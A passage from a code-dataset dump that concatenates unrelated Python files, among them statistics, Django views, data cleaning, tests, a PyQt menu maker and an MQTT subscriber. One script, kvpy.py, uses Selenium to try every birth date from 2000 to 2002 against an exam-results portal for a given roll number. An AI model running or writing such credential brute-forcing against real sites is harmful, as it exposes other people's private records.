__Int:__Int+self.rateBin],axis=1),\r\n\t\t\tself.tBin\r\n\t\t\t)\r\n\r\n\t\tself.spikeCountWindowFloatsArray = np.array(self.spikeCountWindowFloatsList).T\r\n\r\n\t\t#variance over trials\r\n\r\n\t\tself.spikeCountVarianceFloatsArray = np.var(self.spikeCountWindowFloatsArray,axis=0)\r\n\r\n\t\t#mean spike count over trials\r\n\r\n\t\tself.meanSpikeCountFloatsList = map(\r\n\t\t\t\t\tlambda __Int:\r\n\t\t\t\t\tsum(self.rNeuron[__Int:__Int+self.rateBin]),\r\n\t\t\t\t\tself.tBin\r\n\t\t\t\t\t)\r\n\r\n\t\told_settings = np.seterr(all='ignore')\r\n\r\n\t\tself.fanoFactorFloatsArray=np.divide(self.spikeCountVarianceFloatsArray,\r\n\t\tnp.array(self.meanSpikeCountFloatsList)\r\n\t\t)\r\n\r\n\t\tplt.plot((self.rateWindow/2.)+np.array(self.tBin)*self.stepTimeFloat, self.fanoFactorFloatsArray, \r\n\t\t\t\t\tmarker='o', linestyle='--', label=r'FF_${Neuron_'+str(self.chosenNeuron)+'}$')\r\n\r\n\t\tplt.xlabel('Time/ ms', fontsize='large', fontweight='medium')\r\n\t\tplt.ylabel('Fano Factor', fontsize='large', fontweight='medium')\r\n\r\n\t\tplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t\t\r\n\r\n\r\n\r\n","sub_path":"OscillationsPrediNetwork/SpikeTests/statsUtils.py","file_name":"statsUtils.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"607340307","text":"\nimport simplejson as json\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom django import forms\n\nfrom basketball.models import Player, Season\n\n\nclass PlayerList(ListView):\n model = Player\n template_name = 'player_list.html'\n\n\nclass PlayerDetailFilters(forms.Form):\n season = forms.ModelChoiceField(\n queryset=Season.objects.all(),\n widget=forms.Select(attrs={'class': 'form-control input-sm'}))\n\n\nclass PlayerDetail(DetailView):\n model = Player\n template_name = 'player_detail.html'\n\n def get_points_graph_data(self, game_logs):\n point_values = []\n for i, gl in enumerate(game_logs):\n point_values.append({\n 'x': i 
+ 1,\n 'y': gl.draft_king_points,\n 'game': str(gl.game)\n })\n return point_values\n\n def get_playtime_graph_data(self, game_logs):\n point_values = []\n for i, gl in enumerate(game_logs):\n point_values.append({\n 'x': i + 1,\n 'y': gl.minutes,\n 'game': str(gl.game)\n })\n return point_values\n\n def get_graph_data(self, game_logs):\n data = [\n {\n 'values': self.get_points_graph_data(game_logs),\n 'key': 'points',\n 'color': '#ff7f0e',\n },\n {\n 'values': self.get_playtime_graph_data(game_logs),\n 'key': 'playtime',\n 'color': '#cc7ffe',\n },\n ]\n return data\n\n def get_game_logs(self, player):\n return player.gamelog_set.all().order_by('game__date')\n\n def get_context_data(self, **kwargs):\n context = super(PlayerDetail, self).get_context_data(**kwargs)\n player = context['object']\n game_logs = self.get_game_logs(player)\n\n page_filters = PlayerDetailFilters(self.request.GET)\n if page_filters.is_valid():\n\n season = page_filters.cleaned_data.get('season')\n if season:\n game_logs = game_logs.filter(game__season=season)\n\n context['filters'] = page_filters\n context['data'] = json.dumps(self.get_graph_data(game_logs))\n context['average_points'] = player.average_points(game_logs=game_logs)\n context['average_playtime'] = round(player.average_minutes(game_logs=game_logs), 2)\n context['average_pts_per_min'] = round(context['average_points'] / context['average_playtime'], 2)\n context['game_logs'] = game_logs\n return context\n","sub_path":"draftkings/basketball/views/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"252404779","text":"from Pakiet import text\nfrom math import sqrt\n\n\ndef selected_language(choice, choice_txt):\n if choice_txt == \"pl\":\n txt = \"Pierwiastek wynosi: \"\n else:\n txt = \"The root is equal: \"\n text.center(choice.lang['hello'], 50)\n sqr = int(input(choice.lang['info']))\n if sqr < 0:\n text.center(choice.lang['error'], 50)\n else:\n text.center(f\"{txt}{sqrt(sqr)}\", 50)\n text.center(choice.lang['bye'], 50)\n\n\nchoose_lang = input(\"Choose lang [pl/en]\")\n\nif choose_lang == \"pl\":\n from Słownik import pl\n selected_language(pl, choose_lang)\nelse:\n from Słownik import en\n selected_language(en, choose_lang)\n","sub_path":"python/lab5/Słownik/slownik.py","file_name":"slownik.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"584506392","text":"from utils.import_packages import *\nimport utils.hardcode_parameters as param\nfrom data_gathering.DataChecker import DataChecker\nimport pytz\n\ndef convert2RealTime(dateVals, pteVals):\n timeDate = []\n\n for (date,pte) in zip( dateVals,pteVals):\n timeDate.append( date+timedelta(minutes=15*(pte-1)))\n return timeDate\n\ndef convert_PTE_2_rt(df_date, df_pte, periodByHour = 4):\n timeDate = []\n for (date, pte) in zip(df_date, df_pte):\n timeDate.append(date + timedelta(minutes=60 / periodByHour * (pte - 1)))\n return timeDate\n\n\nclass TimeSeriesData():\n def __init__(self, df, date_column, val_column, created_time_column=None, periodByHour = 4, pteCol = None, convertTime = True):\n df[date_column] = pd.to_datetime(df[date_column])\n selected_feat = []\n self.valCol = [x for x in val_column.split(',')]\n selected_feat.extend(self.valCol)\n\n if (pteCol != None) :\n if convertTime:\n df[date_column] = convert_PTE_2_rt(df[date_column], df[pteCol])\n 
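# Worked example for the conversion above (values assumed; periodByHour=4 means 15-minute PTEs): PTE 1 adds 0 minutes and PTE 5 adds 60/4*(5-1) = 60 minutes, so PTE 5 lands at 01:00 on its delivery date.\n 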
selected_feat.append(pteCol)\n self.pteCol = pteCol\n\n selected_feat.append(date_column)\n\n if created_time_column != None:\n selected_feat.append(created_time_column)\n\n self.file = df[selected_feat]\n\n self.dateCol = date_column\n self.fctTimeCol = created_time_column\n self.file[self.dateCol] = pd.to_datetime( self.file[self.dateCol] )\n self.periodByHour = periodByHour\n\n def pre_process_piepline(self):\n # if ('UTC' in self.dateCol) | ('utc' in self.dateCol):\n # self.convert_UTC_2_local( 'DeliveryDate', param.timezone )\n # self.file = self.file.drop( self.dateCol, axis = 1)\n # self.dateCol = 'DeliveryDate'\n # self.file[self.dateCol] = self.file[self.dateCol]\n\n self.remove_duplicate_forecast()\n\n def post_process_piepeline(self, scale_period = 4, interval = '0.25H'):\n # self.scale_forecast_frequency(scale_period, interval)\n self.insert_missing_time()\n self.extract_PTE()\n self.fill_nan_by_avg()\n return self.file\n\n def scale_forecast_freq_by_avg(self, interval, scale_period = 4):\n scaled_df = pd.DataFrame()\n self.file[self.valCol]/=scale_period\n\n print('scale forecast frequency by average')\n for index, row in self.file.iterrows():\n expected_datetime = pd.DatetimeIndex(start=self.file.iloc[index][self.dateCol], periods=self.periodByHour,\n freq=interval).values\n scaled_df = scaled_df.append([row]*self.periodByHour, ignore_index=True)\n scaled_df.iloc[self.periodByHour*index:(self.periodByHour*index+self.periodByHour)][self.dateCol] = expected_datetime\n\n if index % 1000 == 0:\n print('processed {}/{} rows'.format( index /1000 ,int(len(self.file)/1000)))\n\n self.file = scaled_df\n\n def scale_forecast_freq_by_copy(self, interval = '0.25H'):\n scaled_df = pd.DataFrame()\n print('scale forecast frequency by copy:')\n\n for index, row in self.file.iterrows():\n expected_datetime = pd.DatetimeIndex(start=self.file.iloc[index][self.dateCol], periods=self.periodByHour,\n freq=interval).values\n scaled_df = scaled_df.append([row]*self.periodByHour, ignore_index=True)\n scaled_df.iloc[self.periodByHour*index:(self.periodByHour*index+self.periodByHour)][self.dateCol] = expected_datetime\n\n if index % 1000 == 0:\n print('processed {}/{} rows'.format( index /1000 ,int(len(self.file)/1000)))\n\n self.file = scaled_df\n\n def insert_missing_time(self, interval='0.25H'):\n expected_datetime = pd.DatetimeIndex(start=self.file.iloc[0][self.dateCol], end=self.file.iloc[-1][self.dateCol],freq=interval)\n ideal_datetime_df = pd.DataFrame({self.dateCol: expected_datetime})\n\n self.file = ideal_datetime_df.merge(self.file, on=self.dateCol, how='left')\n # full_power_df[self.timeName] = pd.to_datetime(full_power_df[self.timeName])\n return self.file\n\n def extract_PTE(self):\n minutePerPTE = 60 / self.periodByHour\n raw_time = self.file[self.dateCol]\n pte = [int((t.hour*60 + t.minute)/minutePerPTE + 1) for t in raw_time]\n self.file['PTE'] = pte\n self.pteCol = 'PTE'\n\n def get_avg_values(self, valCol):\n avg_val_dict = {}\n\n for i in range(1,self.periodByHour*24+1):\n filteredPTEval = self.file[self.file[self.pteCol] == i][valCol].values\n filteredPTEval = [ 0 if (math.isnan(x) | math.isinf(x)) else x for x in filteredPTEval]\n avg_val_dict[i] = sum(filteredPTEval)/len(filteredPTEval)\n return avg_val_dict\n\n def fill_nan_by_avg(self, imputingCols = None):\n if imputingCols == None:\n imputingCols = self.valCol\n\n for col in imputingCols:\n self.file['missing_' + col] = [1 if (math.isnan(x)|math.isinf(x)) else 0 for x in self.file[col]]\n imputed_dict = 
self.get_avg_values(col)\n\n for pte in imputed_dict:\n imputed_val = imputed_dict[pte]\n pteFile = self.file[self.file[self.pteCol] == pte]\n #group the nan/inf test so it only selects this PTE's rows ('&' binds tighter than '|')\n impute_index = self.file.index[(self.file[self.pteCol] == pte) & (np.isnan(self.file[col]) | np.isinf(self.file[col]))]\n self.file.loc[impute_index, col] = imputed_val\n\n def impute(self, splitHour = 4):\n self.file[self.valCol] /= splitHour\n cur_index = 1\n isMissing = []\n\n while cur_index <= len(self.file):\n\n PTE = self.file.loc[cur_index]['PTE']\n cur_row = self.file.loc[cur_index][self.valCol]\n last_row = self.file.loc[cur_index - 1][self.valCol]\n\n # assume the power forecast data is available/unavailable at the same time.\n if PTE % 4 == 1 and cur_row.isnull().any():\n # impute missing day\n isMissing.append(1)\n if cur_index >= param.max_PTE:\n last_day_data = self.file.loc[cur_index - param.max_PTE][self.valCol]\n impute_data = last_day_data\n self.file.loc[cur_index, self.valCol] = impute_data\n\n else:\n cur_index += 4\n continue\n\n elif PTE % 4 == 1:\n isMissing.append(0)\n impute_data = cur_row\n\n else:\n print(cur_index)\n print(cur_row)\n raise ValueError('Invalid missing values')\n\n isMissing.extend([0,0,0])\n self.file.loc[cur_index + 1, self.valCol] = impute_data\n self.file.loc[cur_index + 2, self.valCol] = impute_data\n self.file.loc[cur_index + 3, self.valCol] = impute_data\n cur_index += 4\n self.file['isMissing'] = isMissing\n\n def remove_duplicate_forecast(self):\n if self.fctTimeCol is None:\n #no forecast-creation column, so there is nothing to deduplicate on\n return\n\n # result = DataChecker( self.file ).check_duplicate_forecast( self.dateCol, self.fctTimeCol )\n result = DataChecker(self.file).check_duplicate_forecast(self.dateCol)\n\n if len(result) > 0:\n print('remove duplicates')\n self.file[self.fctTimeCol] = pd.to_datetime(self.file[self.fctTimeCol])\n self.file = self.file.loc[ self.file.groupby( self.dateCol)[self.fctTimeCol].idxmax().values ]\n self.file = self.file.sort_values(by=[self.dateCol], ascending=True)\n self.file = self.file.reset_index(drop=True)\n\n def convert_UTC_2_local(self, newColName, timezone):\n utc_time = self.file[self.dateCol]\n local_time = [pytz.utc.localize(t) for t in utc_time]\n am_dt = [t.astimezone(timezone) for t in local_time]\n discard_time_zone = [t._short_repr for t in am_dt]\n\n self.file[newColName] = discard_time_zone\n self.file[newColName] = pd.to_datetime( self.file[newColName] )\n","sub_path":"data_gathering/CleanData.py","file_name":"CleanData.py","file_ext":"py","file_size_in_byte":8052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"556826387","text":"import os\nimport sys\nimport unittest\n\nthis_path = os.path.dirname(os.path.realpath(__file__))\nos.chdir(this_path)\nsys.path.append(\"..\\\\\")\n\nfrom mock import MagicMock\nfrom test_runner.webtest import WebTest\n\ndriver = MagicMock()\nweb_test_path = os.path.join(this_path, r'web_tests\\web_test_1.py')\n\n\nclass UtilsTest(unittest.TestCase):\n def test_import_from_path(self):\n web_test = WebTest(driver, web_test_path)\n expected = ['__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__',\n '__spec__', 'web_test_1', 'web_test_2']\n self.assertListEqual(expected, dir(web_test.module))\n\n def test_run_functions_in_module(self):\n web_test = WebTest(driver, web_test_path)\n mocked_module = MagicMock()\n mocked_module.__name__ = \"mock_web_test\"\n web_test.module = mocked_module\n\n 
 _find_functions_in_module_mock = MagicMock(return_value=[\"func_1\", \"func_2\"])\n 
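# Swap in the stub so run_functions_in_module only discovers the two fake names configured above.\n 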
web_test._find_functions_in_module = _find_functions_in_module_mock\n web_test.run_functions_in_module()\n mocked_module.func_1.assert_called_once()\n mocked_module.func_2.assert_called_once()\n\n def test_run_functions_in_module_assert(self):\n web_test = WebTest(driver, web_test_path)\n expected = {'web_test_1': {'web_test_1': (True, False), 'web_test_2': (True, True)}}\n actual = web_test.run_functions_in_module()\n self.assertEqual(actual, expected)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"unit_tests/webtest_test.py","file_name":"webtest_test.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"298297954","text":"import csv\nimport pandas as pd\nimport numpy as np\n\n\n\nfac_cols = ['name', 'degree', 'title', 'email']\nfac_table = pd.read_csv('faculty.csv', \n names = fac_cols, \n header = None, \n skiprows = [0] , \n skipinitialspace=True)\n\nemail = fac_table['email']\nemail.to_csv('UPenn_emails.csv', index = False, header = False)\n","sub_path":"python/advanced_python_csv.py","file_name":"advanced_python_csv.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"340259694","text":"import requests\r\nimport bs4\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\n\r\noptions = Options()\r\noptions.add_argument('--headless')\r\noptions.add_argument('--disable-gpu') # Last I checked this was necessary.\r\nbrowser = webdriver.Chrome(chrome_options=options)\r\nroll = input()\r\nm = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12']\r\nd = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31']\r\nyears = ['2001', '2000', '2002']\r\nfor year in years:\r\n\tfor i in m:\r\n\t\tfor j in d:\r\n\t\t\tbrowser.get(r\"http://kvpy.iisc.ernet.in/kvpy1718/checkMarks.php\")\r\n\t\t\trollno = browser.find_element_by_name(\"id\")\r\n\t\t\trollno.send_keys(roll)\r\n\t\t\tday = browser.find_element_by_name(\"dd\")\r\n\t\t\tmonth = browser.find_element_by_name(\"mm\")\r\n\t\t\tyearyyyy = browser.find_element_by_name(\"yyyy\")\r\n\t\t\tday.send_keys(j)\r\n\t\t\tmonth.send_keys(i)\r\n\t\t\tyearyyyy.send_keys(year)\r\n\t\t\tprint(j, \"-\", i,\"-\", year)\r\n\t\t\tsubmit = browser.find_element_by_xpath(\"/html/body/div/div[2]/form/input[5]\")\r\n\t\t\tsubmit.click()\r\n\t\t\tif browser.find_elements_by_css_selector('body > div > div:nth-child(8) > div:nth-child(5)'):\r\n\t\t\t\tprint(\"success\")\r\n\t\t\t\tbreak\r\n\r\n","sub_path":"kvpy.py","file_name":"kvpy.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"630459529","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom PyQt5.QtWidgets import (QApplication, \n QWidget, \n QTableWidget, \n QCheckBox, \n QLabel, \n QLineEdit, \n QPushButton,\n QHBoxLayout,\n QVBoxLayout)\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import Qt\n\nAPPPATHLIST = ('/usr/share/applications', )\nICONPATHLIST = ('/usr/share/app-install/icons/', '/usr/share/icons/', )\nICONPATH = '/usr/share/app-install/icons/'\nTEMPLATE = '''\nN += 1\nTILESET.append(InitTile())\nTILESET[N].tile = DesktopEntry\nTILESET[N].xy = (%d, %d)\nTILESET[N].extra = (%d, 
'%s', '%s')\n'''\nBEGIN = '''\n#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom TestTiles import *\nfrom AbstractTile import *\n \nTILESET = []\nN = -1\n\nclass InitTile():\n def __init__(self, tile=None, xy=(0, 0)):\n self.tile = tile\n self.xy = xy\n\nN += 1\nTILESET.append(InitTile())\nTILESET[N].tile = Close\nTILESET[N].xy = (-1, -1)\nTILESET[N].extra = None\n'''\nFILENAME = 'imports.py'\nCHECKALL = True\nW, H = 21, 9\nSIZE = 1\n\nclass Menumaker(QWidget):\n entries = []\n \n def __init__(self):\n super().__init__()\n self.initTable()\n gen = QPushButton('Generate')\n gen.clicked.connect(self.output)\n filename = QLineEdit(FILENAME)\n hbox0 = QHBoxLayout()\n hbox0.addWidget(gen)\n hbox0.addWidget(filename)\n save = QPushButton('Save')\n savefn = QLineEdit('TileMenuDesktopEntries.cfg')\n hbox1 = QHBoxLayout()\n hbox1.addWidget(save)\n hbox1.addWidget(savefn)\n load = QPushButton('Load')\n loadfn = QLineEdit('TileMenuDesktopEntries.cfg')\n hbox2 = QHBoxLayout()\n hbox2.addWidget(load)\n hbox2.addWidget(loadfn)\n vbox = QVBoxLayout()\n vbox.addWidget(self.table)\n vbox.addLayout(hbox1)\n vbox.addLayout(hbox2)\n vbox.addLayout(hbox0)\n self.setGeometry(300, 300, 960, 500)\n self.setLayout(vbox)\n self.show()\n\n def findEntries(self):\n desktopfiles = []\n for i in APPPATHLIST:\n try:\n lst = os.listdir(path=i)\n for j in lst:\n desktopfiles.append(i + '/' + j)\n except FileNotFoundError:\n pass \n self.entries = []\n i = 0\n for f in desktopfiles:\n file = open(f)\n params = {}\n for line in file:\n s = line.split('=')\n if s[0] == 'Icon' or s[0] == 'Exec' or s[0] == 'Name':\n params.update({s[0] : s[1][0:-1]})\n if params.get('Icon', None) == None:\n params['Icon'] = 'noicon'\n if params.get('Name', None) == None:\n params['Name'] = 'noname'\n if params.get('Exec', None) == None:\n params['Exec'] = 'true'\n params['On'] = CHECKALL\n s = SIZE\n x = i % W * s\n y = i // W * s\n params.update({'Size':s, 'x':x, 'y':y})\n params['Icon'] = self.iconPath(params['Icon'])\n self.entries.append(params)\n i += 1\n\n def output(self, filename):\n self.getEntriesFromTable()\n filename = 'test.py'\n out = open(filename, 'w') \n out.write(BEGIN)\n for e in self.entries:\n if e.get('Exec') != None and e.get('On'):\n out.write(TEMPLATE % (e['x'], e['y'], e['Size'], e.get('Exec', ''), e.get('Icon', '')))\n out.close()\n \n def initTable(self):\n self.findEntries()\n self.table = QTableWidget(len(self.entries), 4)\n self.table.setColumnWidth(0, self.table.rowHeight(0))\n self.table.setColumnWidth(1, 150)\n self.table.setColumnWidth(2, 300)\n self.table.setColumnWidth(3, 400)\n i = 0\n for e in self.entries:\n self.table.setCellWidget(i, 0, QCheckBox(''))\n self.table.cellWidget(i, 0).setCheckState(e['On'])\n self.table.cellWidget(i, 0).setTristate(False)\n self.table.setCellWidget(i, 1, QLabel(e['Name']))\n self.table.setCellWidget(i, 2, QLineEdit(e['Exec']))\n self.table.setCellWidget(i, 3, QLineEdit(e['Icon']))\n i += 1\n \n def getEntriesFromTable(self):\n for i in range(self.table.rowCount()):\n self.entries[i]['On'] = bool(self.table.cellWidget(i, 0).checkState())\n self.entries[i]['Exec'] = self.table.cellWidget(i, 2).text()\n self.entries[i]['Icon'] = self.table.cellWidget(i, 3).text()\n \n \nif __name__ == '__main__':\n app = QApplication(sys.argv)\n w = Menumaker()\n sys.exit(app.exec_())","sub_path":"makemenu.py","file_name":"makemenu.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
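# Aside (illustrative snippet, not one of the dataset records): Menumaker.findEntries
# above builds its tile list by scanning .desktop files and keeping only the
# Name/Exec/Icon keys, with fallbacks for missing ones. A minimal standalone sketch
# of that parsing idea; it uses str.partition so values containing '=' (common in
# Exec lines) survive intact, and the path in the usage comment is hypothetical.
def parse_desktop_entry(path):
    """Return {'Name', 'Exec', 'Icon'} for one .desktop file, with defaults."""
    params = {'Name': 'noname', 'Exec': 'true', 'Icon': 'noicon'}
    with open(path) as f:
        for line in f:
            key, sep, value = line.partition('=')
            if sep and key in params:
                params[key] = value.strip()
    return params
# Usage (hypothetical path): parse_desktop_entry('/usr/share/applications/firefox.desktop')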
+{"seq_id":"4881063","text":"class Persona:\n def __init__(self):\n self.nombre = \"\"\n self.edad = \"\"\n self.direccion = \"\"\n self.telefono = \"\"\n\n\nif __name__ == \"__main__\":\n persona = Persona()\n persona.nombre = input(\"nombre: \")\n persona.edad = input(\"edad: \")\n persona.direccion = input(\"direccion: \")\n persona.telefono = input(\"telefono: \")\n print(persona.nombre, \" vive en \", persona.direccion, \" tiene \", \n persona.edad, \" años y su tel es \", persona.telefono)\n","sub_path":"57031-porollan-santiago/tp1/copia_nueva/ej9_nuevo.py","file_name":"ej9_nuevo.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"163343542","text":"#!/usr/bin/python3\n\"\"\" class Square that defines a square AND validates size \"\"\"\n\n\nclass Square:\n \"\"\" Square with size verification\n Attributes:\n __size (int): Must be Integer type and >= 0\n \"\"\"\n __size = 0\n\n def __init__(self, size=0):\n \"\"\" Instantiate with proper size a Square object \"\"\"\n if type(size) != int:\n raise TypeError(\"size must be an integer\")\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n self.__size = size\n","sub_path":"0x06-python-classes/2-square.py","file_name":"2-square.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"174042217","text":"#!/usr/bin/python3\n\"\"\" N queens \"\"\"\nfrom sys import argv\n\nargc = len(argv)\nif argc != 2:\n print('Usage: nqueens N')\n exit(1)\n\nnum = argv[1]\ntry:\n num = int(num)\nexcept ValueError:\n print('N must be a number')\n exit(1)\n\nif num < 4:\n print(\"N must be at least 4\")\n exit(1)\n","sub_path":"0x0C-nqueens/0-nqueens.py","file_name":"0-nqueens.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"365439961","text":"import zipfile\nimport os\nimport math\n\nimport requests\nimport magic\n\nimport numpy as np\n\nclass FileData():\n def __init__(self, filename, entropy=None, filetype=None, size=None) -> None:\n self.filename = filename\n if not entropy:\n # Credit for entropy calculations: https://github.com/mattnotmax/entropy/blob/master/entropy.py\n with open(filename, 'rb') as f:\n byteArr = list(f.read())\n \n entropy = get_entropy(byteArr)\n\n self.entropy = entropy\n \n if not filetype:\n f = magic.Magic(mime=True, uncompress=True)\n filetype = f.from_file(filename)\n\n self.filetype = filetype\n\n if not size:\n size = os.path.getsize(filename)\n\n self.size = size\n \n def delete(self):\n os.remove(self.filename)\n\ndef get_entropy(contents, base=None):\n \"\"\" Computes entropy of label distribution. 
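Concretely, this is Shannon entropy: H = -sum_i p_i * log(p_i, base), where p_i is the relative frequency of each distinct value in contents and the log is natural when base is None.\n 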
\"\"\"\n\n n_labels = len(contents)\n\n if n_labels <= 1:\n return 0\n\n value,counts = np.unique(contents, return_counts=True)\n probs = counts / n_labels\n n_classes = np.count_nonzero(probs)\n\n if n_classes <= 1:\n return 0\n\n ent = 0.\n\n # Compute entropy\n base = math.e if base is None else base\n for i in probs:\n ent -= i * math.log(i, base)\n\n return ent\n\n\nclass CompressionResult():\n def __init__(self, file_data, results) -> None:\n self.file = file_data\n self.results = results\n\n def best_result(self, best=\"ratio\"):\n if not self.results:\n return None\n \n best_result = self.results[0]\n for result in self.results:\n if best == \"ratio\" and result.Ratio < best_result.Ratio:\n best_result = result\n elif best == \"-ratio\" and result.Ratio > best_result.Ratio:\n best_result = result\n \n return best_result\n\ndef discover(path=\".\"):\n return [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]\n\ndef download_file(url, unzip=False):\n files = []\n local_filename = url.split('/')[-1]\n with requests.get(url, stream=True) as r:\n r.raise_for_status()\n with open(local_filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=8192): \n f.write(chunk)\n if not unzip:\n files.append(local_filename)\n \n if unzip:\n with zipfile.ZipFile(local_filename, 'r') as zip_ref:\n for name in zip_ref.namelist():\n zip_ref.extract(name, \".\")\n files.append(name)\n os.remove(local_filename)\n \n\n return files","sub_path":"ai/helpers/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"325269381","text":"import scipy as sp\nimport numpy as np\nfrom scipy.optimize import minimize\nimport matplotlib.pyplot as plt\n\n\n#define a function here\ndef myfunc(x):\n return 2*x*x*x*x-6*x*x*x+8\n\n\nx0 = np.arange(1,3.5,.01)\n\n\nmin = minimize(myfunc,1)\n\n\nprint (\"Minimum of the function is : \",\"(\",min.x[0],min.fun,\")\" )\nplt.figure()\nplt.plot(x0,myfunc(x0),\"r\",label =\"Function\")\nplt.plot(min.x[0],min.fun,\"bo\",label = \"Minimum of Function\")\nplt.title(\"Function minimization using Scipy\")\nplt.xlabel(\"x\"+r\"$\\rightarrow$\")\nplt.ylabel(\"f(x)\"+r\"$\\rightarrow$\")\nplt.legend()\n\nplt.show()\n","sub_path":"python/Minimizer.py","file_name":"Minimizer.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"626111855","text":"from src.sqlite import conditioner_status_handler\nimport paho.mqtt.client as mqttc\n\n# MQTT Settings\nMQTT_Broker = \"test.mosquitto.org\"\nMQTT_Port = 1883\nKeep_Alive_Interval = 45\nMQTT_Topic = \"Home/Conditioner/Status\"\n\n\ndef on_connect(client, userdata, flags, rc):\n if rc == 0:\n print(\"Connected OK\")\n client.subscribe(MQTT_Topic)\n else:\n print(\"Bad connection, RC = \", rc)\n\n\n# Save Data into DB Table\ndef on_message(client, userdata, msg):\n # This is the Master Call for saving MQTT Data into DB\n # For details of \"sensor_Data_Handler\" function please refer \"sensor_data_to_db.py\"\n print(\"MQTT Data Received...\")\n print(\"MQTT Topic: \" + msg.topic)\n print(\"Data\" + str(msg.payload))\n conditioner_status_handler(msg.topic, msg.payload)\n\n\ndef assign_callbacks_to_client(client):\n client.on_connect = on_connect\n client.on_message = on_message\n\n\ndef conditioner_subscribe():\n sub_clientA = mqttc.Client(client_id=\"clientgonnasubA\")\n if not sub_clientA.is_connected():\n 
sub_clientA.connect_async(MQTT_Broker, MQTT_Port)\n assign_callbacks_to_client(sub_clientA)\n sub_clientA.loop_start()\n","sub_path":"src/subscribers/conditioner.py","file_name":"conditioner.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"12885968","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/chiararasi/Documents/work/GITs/patientMatcher/patientMatcher/match/phenotype_matcher.py\n# Compiled at: 2019-04-25 09:29:38\n# Size of source mod 2**32: 7776 bytes\nimport os, logging\nfrom patientMatcher.parse.patient import features_to_hpo, disorders_to_omim\nfrom patientMatcher.resources import path_to_hpo_terms, path_to_phenotype_annotations\nfrom patient_similarity import HPO, Diseases, HPOIC, Patient\nfrom patient_similarity.__main__ import compare_patients\nLOG = logging.getLogger(__name__)\nPHENOTYPE_ROOT = 'HP:0000001'\n\ndef match(database, max_score, features, disorders):\n \"\"\"Handles phenotype matching algorithm\n\n Args:\n database(pymongo.database.Database)\n max_score(float): a number between 0 and 1\n features(list): a list of phenotype feature objects (example ID = HP:0008619)\n disorders(list): a list of OMIM diagnoses (example ID = MIM:616007 )\n\n Returns:\n matches(dict): a dictionary of patient matches with phenotype matching score\n \"\"\"\n matches = {}\n hpo_terms = []\n omim_terms = []\n query_fields = []\n hpoic = None\n hpo = None\n LOG.info('\\n\\n###### Running phenotype matcher module ######')\n if features:\n hpo_terms = features_to_hpo(features)\n query_fields.append({'features': {'$exists':True, '$ne':[]}})\n LOG.info('Creating HPO information content')\n hpo = HPO(path_to_hpo_terms, new_root=PHENOTYPE_ROOT)\n diseases = Diseases(path_to_phenotype_annotations)\n hpoic = HPOIC(hpo, diseases, orphanet=None, patients=False, use_disease_prevalence=False,\n use_phenotype_frequency=False,\n distribute_ic_to_leaves=False)\n if disorders:\n omim_terms = disorders_to_omim(disorders)\n query_fields.append({'disorders.id': {'$in': omim_terms}})\n if len(query_fields) > 0:\n query = {'$or': query_fields}\n LOG.info('Searching for patients in database with the following query:{}'.format(query))\n pheno_matching_patients = list(database['patients'].find(query))\n LOG.info(\"\\n\\nFOUND {} patients matching patients's phenotype tracts\\n\\n\".format(len(pheno_matching_patients)))\n for i in range(len(pheno_matching_patients)):\n patient = pheno_matching_patients[i]\n LOG.info('## Evaluating phenotype similarity with patient {} ##'.format(i + 1))\n similarity = evaluate_pheno_similariy(hpoic, hpo, hpo_terms, omim_terms, patient, max_score)\n match = {'patient_obj':patient, \n 'pheno_score':similarity}\n matches[patient['_id']] = match\n\n return 